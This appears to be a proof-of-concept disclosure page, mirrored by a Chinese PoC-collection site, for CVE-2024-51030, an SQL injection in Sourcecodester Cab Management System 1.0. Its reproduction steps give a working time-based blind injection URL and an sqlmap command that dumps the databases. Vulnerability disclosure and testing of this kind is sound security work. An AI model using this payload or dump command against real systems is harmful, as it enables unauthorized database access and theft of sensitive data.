POC详情: 0e0447d4f1ad2d2bed014f3d173b8af4963b9294

来源
关联漏洞
标题: Sourcecodester Cab Management System 安全漏洞 (CVE-2024-51030)
描述:Sourcecodester Cab Management System是Sourcecodester开源的一个出租车管理系统。 Sourcecodester Cab Management System 1.0版本存在安全漏洞,该漏洞源于manage_client.php和view_cab.php中的id参数包含一个SQL注入漏洞。
介绍
# CVE-2024-51030

### Description
A SQL injection vulnerability in manage_client.php and view_cab.php of Sourcecodester Cab Management System 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter, leading to unauthorized access and potential compromise of sensitive data within the database.

### Vulnerability Type
SQL Injection

### Vendor of Product
Sourcecodester

### Affected Product Code Base: 
https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0

### Affected Component: 
The Sourcecodester Cab Management System v1.0  is vulnerable to SQL injection through the id parameter in the manage_client.php & view_cab.php page.

### Attack Vectors:
1) Set up the application locally and login using the default provided admin credentials or you may also login using low privileged admin user like (staff).
2) Now, navigate to the following URL in your browser: http://localhost/cms/admin/?page=clients/manage_client&id=1
3) Inject SQL Payload: Modify the id parameter in the URL to include a boolean-based blind or time-based blind SQL injection payload:- http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
4) Observe the Application Response: The page should take noticeably longer (5 seconds) to load if the injection is successful, confirming that the id parameter is vulnerable to SQL injection.
5) Now use SQLMap tool for further exploitation and dumping databases using the below command: sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1"  -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs  --dump

### Reference: 
1) https://owasp.org/www-community/attacks/SQL_Injection
2) https://portswigger.net/web-security/sql-injection
文件快照

[4.0K] /data/pocs/0e0447d4f1ad2d2bed014f3d173b8af4963b9294 └── [1.8K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。